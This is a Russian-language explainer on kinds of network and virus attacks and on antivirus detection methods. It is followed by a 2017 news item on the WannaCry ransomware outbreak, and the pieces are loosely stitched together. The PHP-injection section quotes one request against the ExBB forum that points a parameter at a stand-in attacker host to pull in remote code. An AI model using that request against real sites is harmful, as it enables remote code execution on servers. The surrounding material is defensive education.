Вышеперечисленные фрагменты - это далеко не полный список последствий атаки WannaCry, во многих случаях вред еще не оценён. «В связи с подозрениями в общенациональной кибератаке мы принимаем все предупреждающие меры, чтобы защитить здешние системы и серверы NHS», - говорилось в

Содержание:
Введение

Вирусные атаки и их виды.
Средства обнаружения вирусных атак.

Заключение

Введение
Вирусная атака - это покушение на удалённую/локальную вычислительную систему с использованием вредоносных программ (вирусов).
Вирусные атаки представляет собой более изощрённый метод получения доступа к закрытой информации, так как хакеры используют специальные программы для ведения работы на компьютере жертвы, а также дальнейшего распространения (это вирусы и черви). Такие программы предназначены для поиска и передачи своему владельцу секретной информации, либо просто для нанесения вреда системе безопасности и работоспособности компьютера жертвы. Принципы действия этих программ различны.
На данный момент вирусные атаки представляют серьезную угрозу для простых пользователей, не говоря уже и о крупных предприятиях, информация которых может иметь огромную ценность. Именно по этой причине организация и проведение вирусных атак представляет из себя целую индустрию, в которой заинтересованы не только злоумышленники (сетевые преступники), но и производители антивирусного ПО.
Мы, как простые пользователи ПК, должны знать, как защититься от вирусных атак, как не стать ее случайными участниками, а для этого нужно знать – что же такое вирусная атака, способы и методы их применения.

Вирусные атаки и их виды.

Вирусная атака - действие, целью которого является захват контроля (повышение прав) над удалённой/локальной вычислительной системой, либо её дестабилизация, либо отказ в обслуживании.

Mailbombing

Считается самым старым методом атак, хотя суть его проста и примитивна: большое количество почтовых сообщений делают невозможными работу с почтовыми ящиками, а иногда и с целыми почтовыми серверами. Для этой цели было разработано множество программ, и даже неопытный пользователь мог совершить атаку, указав всего лишь e-mail жертвы, текст сообщения, и количество необходимых сообщений. Многие такие программы позволяли прятать реальный IP-адрес отправителя, используя для рассылки анонимный почтовый сервер. Эту атаку сложно предотвратить, так как даже почтовые фильтры провайдеров не могут определить реального отправителя спама. Провайдер может ограничить количество писем от одного отправителя, но адрес отправителя и тема зачастую генерируются случайным образом.

Переполнение буфера

Пожалуй, один из самых распространенных типов атак в Интернете. Принцип данной атаки построен на использовании программных ошибок, позволяющих вызвать нарушение границ памяти и аварийно завершить приложение или выполнить произвольный бинарный код от имени пользователя, под которым работала уязвимая программа. Если программа работает под учётной записью администратора системы, то данная атака позволит получить полный контроль над компьютером жертвы, поэтому рекомендуется работать под учётной записью рядового пользователя, имеющего ограниченные права на системе, а под учётной записью администратора системы выполнять только операции, требующие административные права.

Сетевая разведка

В ходе такой атаки собственно не производится никаких деструктивных действий, но в результате он может получить закрытую информацию о построении и принципах функционирования вычислительной системы жертвы. Полученная информация может быть использована для грамотного построения предстоящей атаки, и обычно производится на подготовительных этапах.
В ходе такой разведки злоумышленник может производить сканирование портов, запросы DNS, эхо-тестирование открытых портов, наличие и защищённость прокси-серверов. В результате можно получить информацию о существующих в системе DNS-адресах, кому они принадлежат, какие сервисы на них доступны, уровень доступа к этим сервисам для внешних и внутренних пользователей.

Сниффинг пакетов

Также довольно распространённый вид атаки, основанный на работе сетевой карты в режиме promiscuous mode, а также monitor mode для сетей Wi-Fi. В таком режиме все пакеты, полученные сетевой картой, пересылаются на обработку специальному приложению, называемым сниффером, для обработки. В результате злоумышленник может получить большое количество служебной информации: кто, откуда и куда передавал пакеты, через какие адреса эти пакеты проходили. Самой большой опасностью такой атаки является получение самой информации, например логинов и паролей сотрудников, которые можно использовать для незаконного проникновения в систему под видом обычного сотрудника компании.

IP-спуфинг

Тоже распространённый вид атаки в недостаточно защищённых сетях, когда злоумышленник выдаёт себя за санкционированного пользователя, находясь в самой организации, или за её пределами. Для этого крэкеру необходимо воспользоваться IP-адресом, разрешённым в системе безопасности сети. Такая атака возможна, если система безопасности позволяет идентификацию пользователя только по IP-адресу и не требует дополнительных подтверждений.

Man-in-the-Middle

Вид атаки, когда злоумышленник перехватывает канал связи между двумя системами, и получает доступ ко всей передаваемой информации. При получении доступа на таком уровне злоумышленник может модифицировать информацию нужным ему образом, чтобы достичь своих целей. Цель такой атаки - кража или фальсифицирование передаваемой информации, или же получение доступа к ресурсам сети. Такие атаки крайне сложно отследить, так как обычно злоумышленник находится внутри организации.

Инъекция

Атака, связанная с различного рода инъекциями, подразумевает внедрение сторонних команд или данных в работающую систему с целью изменения хода работы системы, а в результате - получение доступа к закрытым функциям и информации, либо дестабилизации работы системы в целом. Наиболее популярна такая атака в сети Интернет, но также может быть проведена через командную строку системы.
SQL-инъекция - атака, в ходе которой изменяются параметры SQL- запросов к базе данных. В результате запрос приобретает совершенно иной смысл, и в случае недостаточной фильтрации входных данных способен не только произвести вывод конфиденциальной информации, но и изменить/удалить данные. Очень часто такой вид атаки можно наблюдать на примере сайтов, которые используют параметры командной строки (в данном случае - переменные URL) для построения SQL-запросов к базам данных без соответствующей проверки.
Вместо проверки можно подставить утверждение, которое будучи истинным позволит обойти проверку

PHP-инъекция - один из способов взлома веб-сайтов, работающих на PHP. Он заключается в том, чтобы внедрить специально сформированный злонамеренный сценарий в код веб-приложения на серверной стороне сайта, что приводит к выполнению произвольных команд. Известно, что во многих распространённых в интернете бесплатных движках и форумах, работающих на PHP (чаще всего это устаревшие версии) есть непродуманные модули или отдельные конструкции с уязвимостями. Крэкеры анализируют такие уязвимости, как неэкранированные переменные, получающие внешние значения, например старая уязвимость форума ExBB используется хакерами запросом:
GET //modules/threadstop/ threadstop.php?new_exbb=evilhackerscorp.com/tx. txt????? .
Межсайтовый скриптинг или XSS (аббр. от англ. Cross Site Scripting) - тип уязвимостей, обычно обнаруживаемых в веб-приложениях, которые позволяют внедрять код злонамеренным пользователям в веб-страницы, просматриваемые другими пользователями. Примерами такого кода являются HTML-код и скрипты, выполняющиеся на стороне клиента, чаще всего JavaScript. Другие названия: CSS, реже - скрипт-инъекция.
XPath-инъекция - вид уязвимостей, который заключается во внедрении XPath-выражений в оригинальный запрос к базе данных XML. Как и при остальных видах инъекций, уязвимость возможна ввиду недостаточной проверки входных данных.

Отказ в обслуживании

DoS (от англ. Denial of Service - Отказ в обслуживании) - атака, имеющая своей целью заставить сервер не отвечать на запросы. Такой вид атаки не подразумевает получение некоторой секретной информации, но иногда бывает подспорьем в инициализации других атак. Например, некоторые программы из-за ошибок в своём коде могут вызывать исключительные ситуации, и при отключении сервисов способны исполнять код, предоставленный злоумышленником или атаки лавинного типа, когда сервер не может обработать огромное количество входящих пакетов.
DDoS (от англ. Distributed Denial of Service - Распределенная DoS) - подтип DoS атаки, имеющий ту же цель что и DoS, но производимой не с одного компьютера, а с нескольких компьютеров в сети. В данных типах атак используется либо возникновение ошибок, приводящих к отказу сервиса, либо срабатывание защиты, приводящей к блокированию работы сервиса, а в результате также к отказу в обслуживании. DDoS используется там, где обычный DoS неэффективен. Для этого несколько компьютеров объединяются, и каждый производит DoS атаку на систему жертвы. Вместе это называется DDoS-атака.
Любая атака представляет собой не что иное, как попытку использовать несовершенство системы безопасности жертвы либо для получения информации, либо для нанесения вреда системе, поэтому причиной любой удачной атаки является профессионализм крэкера и ценность информации, а также недостаточная компетенция администратора системы безопасности в частности, несовершенство программного обеспечения и недостаточное внимание к вопросам безопасности в компании в целом.

Средства обнаружения вирусных атак.

На данный момент антивирусное программное обеспечение разрабатывается в основном для ОС семейства Windows от компании Microsoft, что вызвано большим количеством вредоносных программ именно под эту платформу (а это, в свою очередь, вызвано большой популярностью этой ОС, также как и большим количеством средств разработки, в том числе бесплатных и даже «инструкций по написанию вирусов»). В настоящий момент на рынок выходят продукты и под другие платформы настольных компьютеров, такие как Linux и Mac OS X. Это вызвано началом распространения вредоносных программ и под эти платформы, хотя UNIX-подобные системы всегда славились своей надежностью. Например, известное видео «Mac or PC» шуточно показывает преимущество Mac OS над Windows и большим антивирусным иммунитетом Mac OS по сравнению с Windows.

Помимо ОС для настольных компьютеров и ноутбуков, также существуют платформы и для мобильных устройств, такие как Windows Mobile, Symbian, iOS, BlackBerry, Android, Windows Phone 7 и др. Пользователи устройств на данных ОС также подвержены риску заражения вредоносным программным обеспечением, поэтому некоторые разработчики антивирусных программ выпускают продукты и для таких устройств.

Классификация антивирусных продуктов
Классифицировать антивирусные продукты можно сразу по нескольким признакам, таким как: используемые технологии антивирусной защиты, функционал продуктов, целевые платформы.

По используемым технологиям антивирусной защиты:

Классические антивирусные продукты (продукты, применяющие только сигнатурный метод детектирования)
Продукты проактивной антивирусной защиты (продукты, применяющие только проактивные технологии антивирусной защиты);
Комбинированные продукты (продукты, применяющие как классические, сигнатурные методы защиты, так и проактивные)

По функционалу продуктов:

Антивирусные продукты (продукты, обеспечивающие только антивирусную защиту)
Комбинированные продукты (продукты, обеспечивающие не только защиту от вредоносных программ, но и фильтрацию спама, шифрование и резервное копирование данных и другие функции)

Эффективность системы обнаружения атак во многом зависит от применяемых методов анализа полученной информации. В первых системах обнаружения атак, разработанных в начале 1980-х годов, использовались статистические методы обнаружения атак. В настоящее время к статистическому анализу добавился ряд новых методик, начиная с экспертных систем и нечёткой логики и заканчивая использованием нейронных сетей.

Статистический метод

Основные преимущества статистического подхода - использование уже разработанного и зарекомендовавшего себя аппарата математической статистики и адаптация к поведению субъекта.
Сначала для всех субъектов анализируемой системы определяются профили. Любое отклонение используемого профиля от эталонного считается несанкционированной деятельностью. Статистические методы универсальны, поскольку для проведения анализа не требуется знания о возможных атаках и используемых ими уязвимостях. Однако при использовании этих методик возникают и проблемы:

«статистические» системы не чувствительны к порядку следования событий; в некоторых случаях одни и те же события в зависимости от порядка их следования могут характеризовать аномальную или нормальную деятельность;
трудно задать граничные (пороговые) значения отслеживаемых системой обнаружения атак характеристик, чтобы адекватно идентифицировать аномальную деятельность;
«статистические» системы могут быть с течением времени «обучены» нарушителями так, чтобы атакующие действия рассматривались как нормальные.

Следует также учитывать, что статистические методы не применимы в тех случаях, когда для пользователя отсутствует шаблон типичного поведения или когда для пользователя типичны несанкционированные действия.

Экспертные системы

Экспертные системы состоят из набора правил, которые охватывают знания человека-эксперта. Использование экспертных систем представляет собой распространенный метод обнаружения атак, при котором информация об атаках формулируется в виде правил. Эти правила могут быть записаны, например, в виде последовательности действий или в виде сигнатуры. При выполнении любого из этих правил принимается решение о наличии несанкционированной деятельности. Важным достоинством такого подхода является практически полное отсутствие ложных тревог.
БД экспертной системы должна содержать сценарии большинства известных на сегодняшний день атак. Для того чтобы оставаться постоянно актуальными, экспертные системы требуют постоянного обновления БД. Хотя экспертные системы предлагают хорошую возможность для просмотра данных в журналах регистрации, требуемые обновления могут либо игнорироваться, либо выполняться администратором вручную. Как минимум, это приводит к экспертной системе с ослабленными возможностями. В худшем случае отсутствие надлежащего сопровождения снижает степень защищенности всей сети, вводя ее пользователей в заблуждение относительно действительного уровня защищенности.
Основным недостатком является невозможность отражения неизвестных атак. При этом даже небольшое изменение уже известной атаки может стать серьезным препятствием для функционирования системы обнаружения атак.

Нейронные сети

Большинство современных методов обнаружения атак используют некоторую форму анализа контролируемого пространства на основе правил или статистического подхода. В качестве контролируемого пространства могут выступать журналы регистрации или сетевой трафик. Анализ опирается на набор заранее определённых правил, которые создаются администратором или самой системой обнаружения атак.
Любое разделение атаки во времени или среди нескольких злоумышленников является трудным для обнаружения при помощи экспертных систем. Из-за большого разнообразия атак и хакеров даже специальные постоянные обновления БД правил экспертной системы никогда не дадут гарантии точной идентификации всего диапазона атак.
Использование нейронных сетей является одним из способов преодоления указанных проблем экспертных систем. В отличие от экспертных систем, которые могут дать пользователю определённый ответ о соответствии рассматриваемых характеристик заложенным в БД правилам, нейронная сеть проводит анализ информации и предоставляет возможность оценить, согласуются ли данные с характеристиками, которые она научена распознавать. В то время как степень соответствия нейросетевого представления может достигать 100 %, достоверность выбора полностью зависит от качества системы в анализе примеров поставленной задачи.
Сначала нейросеть обучают правильной идентификации на предварительно подобранной выборке примеров предметной области. Реакция нейросети анализируется и система настраивается таким образом, чтобы достичь удовлетворительных результатов. В дополнение к начальному периоду обучения, нейросеть набирается опыта с течением времени, по мере того, как она проводит анализ данных, связанных с предметной областью.
Важным преимуществом нейронных сетей при обнаружении злоупотреблений является их способность «изучать» характеристики умышленных атак и идентифицировать элементы, которые не похожи на те, что наблюдались в сети прежде.
Каждый из описанных методов обладает рядом достоинств и недостатков, поэтому сейчас практически трудно встретить систему, реализующую только один из описанных методов. Как правило, эти методы используются в совокупности.

Обнаружение, основанное на сигнатурах
Обнаружение, основанное на сигнатурах - метод работы антивирусов и систем обнаружения вторжений, при котором программа, просматривая файл или пакет, обращается к словарю с известными вирусами, составленному авторами программы. В случае соответствия какого-либо участка кода просматриваемой программы известному коду (сигнатуре) вируса в словаре, программа антивирус может заняться выполнением одного из следующих действий:

Удалить инфицированный файл.
Отправить файл в «карантин» (то есть сделать его недоступным для выполнения, с целью недопущения дальнейшего распространения вируса).
Попытаться восстановить файл, удалив сам вирус из тела файла.

Для достижения достаточно продолжительного успеха, при использовании этого метода необходимо периодически пополнять словарь известных вирусов новыми определениями (в основном в онлайновом режиме). Обладающие чувством гражданского долга и технически искушённые пользователи, обнаружив «живьём» новый вирус, могут выслать заражённый файл разработчикам антивирусных программ, которые включат затем новый вирус в словарь.
Антивирусные программы, созданные на основе метода соответствия определению вирусов в словаре, обычно просматривают файлы тогда, когда компьютерная система создаёт, открывает, закрывает или посылает файлы по электронной почте. Таким образом, вирусы можно обнаружить сразу же после занесения их в компьютер и до того, как они смогут причинить какой-либо вред. Надо отметить, что системный администратор может составить график для антивирусной программы, согласно которому могут просматриваться (сканироваться) все файлы на жёстком диске.
Хотя антивирусные программы, созданные на основе поиска соответствия определению вируса в словаре, при обычных обстоятельствах, могут достаточно эффективно препятствовать вспышкам заражения компьютеров, авторы вирусов стараются держаться на полшага впереди таких программ-антивирусов, создавая «олигоморфические», «полиморфические» и, самые новые, «метаморфические» вирусы, в которых некоторые части участки кода перезаписываютсся, модифицируются, шифруются или искажаются так, чтобы невозможно было обнаружить совпадение с определением в словаре вирусов.
Доступно одно описание одного из методов аппаратного сканирования по ссылке. Оно заключается в попутном сканировании потока данных специальным устройством под названием контекстный сопроцессор.

Создание и распределение сигнатур
Сигнатуры антивирусов создаются в результате кропотливого анализа нескольких копий файла, принадлежащего одному вирусу. Сигнатура должна содержать только уникальные строки из этого файла, настолько характерные, чтобы гарантировать минимальную возможность ложного срабатывания - главный приоритет любой антивирусной компании.
Разработка сигнатур - ручной процесс, тяжело поддающийся автоматизации. Несмотря на массу исследований, посвящённых автоматической генерации сигнатур, нарастающий полиморфизм (и «метаморфизм») вирусов и атак делают синтактические сигнатуры бессмысленными. Антивирусные компании вынуждены выпускать большое количество сигнатур для всех вариантов одного и того же вируса, и если бы не закон Мура, ни один современный компьютер уже не смог бы закончить сканирование большого числа файлов с такой массой сигнатур в разумное время.
В нынешнем виде, базы сигнатур должны пополняться регулярно, так как большинство антивирусов не в состоянии обнаруживать новые вирусы самостоятельно. Любой владелец ПО, основанного на сигнатурах, обречён на регулярную зависимость от обновления сигнатур, что составляет основу бизнес-модели производителей антивирусов и СОВ.
Своевременная доставка новых сигнатур до пользователей также является серьёзной проблемой для производителей ПО. Современные вирусы и черви распространяются с такой скоростью, что к моменту выпуска сигнатуры и доставки её на компьютер пользователей, эпидемия уже может достигнуть своей высшей точки и охватить весь мир. По опубликованным данным, доставка сигнатуры занимает от 11 до 97 часов в зависимости от производителя, в то время как теоретически, вирус может захватить весь интернет меньше, чем за 30 секунд.
В большинстве ПО по безопасности база сигнатур является ядром продукта, наиболее трудоёмкой и ценной частью. Именно поэтому большинство вендоров предпочитает держать свои сигнатуры закрытыми - хотя и в этой области существует ряд открытого ПО (напр., ClamAV), а также исследования по обратной разработке закрытых сигнатур. Virus Bulletin регулярно публиковал сигнатуры новых вирусов вплоть до 2000 года.
Проблемы разработки сигнатур и слабого распределения некоторых представителей вредоносного ПО приводят к тому, что разработанные в разных антивирусных компаниях сигнатуры содержат определения для разных подмножеств вирусов. Эту проблему можно устранить, разработав международный стандарт на описание антивирусных сигнатур, который будет содержать необходимую информацию для обнаружения, идентификации и устранения вредоносного ПО. Максимальный эффект от такого стандарта можно получить при реализации централизованной базы знаний по вредоносному ПО, в которую все антивирусные компании будут иметь право записи новых сигнатур (или изменение существующих). Но в таком централизованном хранилище (базе данных) каждая запись должна иметь цифровую подпись автора (конкретной компании), которая будет защищать конечных пользователей от атаки на локальную базу сигнатур путем отравления её содержимого. Так же при добавлении новых записей в центральное хранилище сигнатур должен изменяться рейтинг фирм производителей. Этот рейтинг сделает фирмы заинтересованными, так как их работу пользователь может напрямую оценивать.

Недостатки и достоинства синтаксических сигнатур

Позволяют определять конкретную атаку с высокой точностью и малой долей ложных вызовов
Неспособны выявить какие-либо новые атаки
Беззащитны перед полиморфными вирусами и изменёнными версиями того же вируса
Требуют регулярного и крайне оперативного обновления
Требуют кропотливого ручного анализа вирусов

Метод эвристического сканирования призван улучшить способность сканеров применять сигнатуры и распознавать модифицированные вирусы в тех случаях, когда сигнатура совпадает с телом неизвестной программы не на 100%. Данная технология, однако, применяется в современных программах очень осторожно, так как может повысить количество ложных срабатываний.

Проактивная защита
Проактивные технологии – совокупность технологий и методов, используемых в антивирусном программном обеспечении, основной целью которых, в отличие от реактивных (сигнатурных) технологий, является предотвращение заражения системы пользователя, а не поиск уже известного вредоносного программного обеспечения в системе.

История развития проактивных технологий антивирусной защиты
Проактивные технологии начали развиваться практически одновременно с классическими (сигнатурными) технологиями. Однако, первые реализации проактивных технологий антивирусной защиты требовали высокий уровень квалификации пользователя, т.е. не были рассчитаны на массовое использование простыми пользователями персональных компьютеров. Спустя десятилетие антивирусной индустрии стало очевидно, что сигнатурные методы обнаружения уже не могут обеспечить эффективную защиту пользователей. Этот факт и подтолкнул к возрождению проактивных технологий.

Технологии проактивной защиты:

Эвристический анализ

Технология эвристического анализа позволяет на основе анализа кода выполняемого приложения, скрипта или макроса обнаружить участки кода, отвечающие за вредоносную активность.
Эффективность данной технологии не является высокой, что обусловлено большим количеством ложных срабатываний при повышении чувствительности анализатора, а также большим набором техник, используемых авторами вредоносного ПО для обхода эвристического компонента антивирусного ПО.

Эмуляция кода

Технология эмуляции позволяет запускать приложение в среде эмуляции, эмулируя поведение ОС или центрального процессора. При выполнении приложения в режиме эмуляции приложение не сможет нанести вреда системе пользователя, а вредоносное действие будет детектировано эмулятором.
Несмотря на кажущуюся эффективность данного подхода, он также не лишен недостатков – эмуляция занимает слишком много времени и ресурсов компьютера пользователя, что негативно сказывается на быстродействии при выполнении повседневных операций, также, современные вредоносные программы способны обнаруживать выполнение в эмулированной среде и прекращать свое выполнение в ней.

Анализ поведения

Технология анализа поведения основывается на перехвате всех важных системных функций или установке т.н. мини-фильтров, что позволяет отслеживать всю активность в системе пользователя. Технология поведенческого анализа позволяет оценивать не только единичное действие, но и цепочку действий, что многократно повышает эффективность противодействия вирусным угрозам. Также, поведенческий анализ является технологической основой для целого класса программ – поведенческих блокираторов (HIPS – Host-based Intrusion Systems).
и т.д.................

В последние дни уходящей недели по всему миру прошла волна заражения компьютеров вирусом-шифровальщиком. Пострадали как рядовые граждане, так и вполне серьёзные коммерческие и государственные предприятия и учреждения. По последним данным под удар попали компьютеры из по меньшей мере 150 стран. Но при всей своей массовости вирус поразил далеко не все машины. Как так вышло?

14 05 2017
21:41

Начнём с простого: большинство вирусов попадает на компьютер путём загрузки на него заражённого файла. Чаще всего это исполняемый файл, который требует запуска или же запускается самостоятельно. Для того, чтобы избежать самопроизвольного срабатывания таких программ, система безопасности Windows запрашивает ваше согласие на выполнение действия со свежеустановленным файлом. В случае, если вы не дадите разрешения на запуск приложения, процесс будет автоматически прерван.

Вирусы, которые распространяются внутри локальной сети или путём передачи с помощью внешних устройств (диски, карты памяти), система может обнаружить далеко не всегда. Для этого существует вторая линия обороны – антивирус. Такое ПО позволяет сканировать носители на предмет вредоносных программ, а также проводить регулярную проверку компьютера. Наиболее распространённые антивирусы (NOD 32, Avast, Avira, Kaspersky lab.) обладают широкой базой данных о возможных опасностях, которые регулярно обновляются производителем программ. Чем обширнее база, тем больше вероятность того, что попавший на вашу машину вирус входит в неё, а значит, будет оперативно обнаружен.

Заражение компьютера не всегда становится заметно сразу. Часто всего проблемы начинаются с замедления работы системы, постепенного сокращения свободного места на дисках или же «слетания» заполненных и внесенных в память паролей. В какой-то момент компьютер перестаёт нормально работать – отказывает загружаться или запускать те или иные сервисы и программы, самопроизвольно выключается через определённый промежуток времени. Что с этим делать?

В первую очередь, не паниковать. Если вы не уверены, что способны самостоятельно справиться с проблемой, выключите компьютер и свяжитесь со специалистом. В выключенном виде вирусы не распространяются, так что хуже вы точно не сделаете.

Если же всё не так печально (к примеру, компьютер загружается, но периодически появляются странные окна, надписи и т.д.), то стоит запустить проверку антивирусом. При обнаружении проблем лечить и удалять повреждённые файлы. Программа по защите сама подскажет, что и как делать с виновниками происходящего.

Однако некоторые вирусы блокируют запуск ПО, которое может их обнаружить. Для этого крупные разработчики создали специальный сервис по проверке компьютера на вредоносные программы без установки приложения. Пользователь запускает на компьютере исполняемый файл, который при помощи интернет-канала устанавливает соединение с базой данных вирусов и производит сканирование машины. После обнаружения заражённые файлы также подлежат удалению.

Вирусы-шифровальщики также поддаются «лечению». Правда, для того, чтобы расшифровать свои данные, вам потребуется код, который преступники якобы должны высылать своей жертве. Для старых версий подобных программ коды известны, их можно найти на просторах интернета в свободном доступе.

Но последний вирус, поразивший весь мир, таких кодов не имел. Распространялся он по сети, при этом вовсе не обязательно было что-то устанавливать на компьютер – шифровальщик цеплялся к машине самостоятельно. При попытке оперативного (до появления сообщения о заражении) лечения указанными выше способами он появляется вновь, рано или поздно открывая окно с информацией о том, что ваше устройство было взломано. Этот вирус лечится, но проще всего переустановить всю систему. В любом случае будут потеряны все аудио-, видеофайлы, изображения и текстовые документы, ведь они уже зашифрованы, так что полное обновление системы будет просто более быстрым решением. Действенных способов спасти и расшифровать файлы пока нет.

Но почему он поразил не все компьютеры? Помимо того, что во время прохождения атаки не все пользователи были в сети, часть из активных компьютеров была защищена путём обновления Windows. Да, всё правильно. Те, кто не убирал галочки с поля «разрешить автоматическую установку обновлений», оказались в безопасности, ибо критическая уязвимость, которой пользуется этот шифровальщик, была устранена более месяца назад.

Чтобы ничего подобного не прилетало по сети безнаказанно, необходимо пользоваться ещё одним защитным механизмом – фаерволом. Это, грубо говоря, фильтр данных, поступающих на вашу компьютер по сети. Часто он блокирует работу безобидных программ, игр и пакетов с неизвестным создателем, что бывает очень неудобно в обычной ситуации. Но защита – так защита.

Будьте бдительны. Дублируйте свои документы на внешних и облачных носителях.

Дмитрий Потапкин, специально для Обзор.press.